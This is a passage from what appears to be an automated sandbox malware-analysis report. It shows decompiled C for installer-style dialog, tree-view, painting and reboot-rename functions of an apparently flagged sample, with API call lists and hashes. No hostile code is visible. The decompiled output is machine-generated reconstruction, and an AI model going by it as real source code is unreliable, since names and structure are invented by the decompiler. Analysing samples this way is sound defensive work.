							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x544f92
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054a2
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

M, xrefs: 004050BA
N, xrefs: 0040519B
, xrefs: 004054D4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x541604
						_t29 = _t69 + 0x14; // 0x541618
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x544f92
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b4
0x004047b9
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x0040467a
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

Call, xrefs: 00404835
N, xrefs: 004047F4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
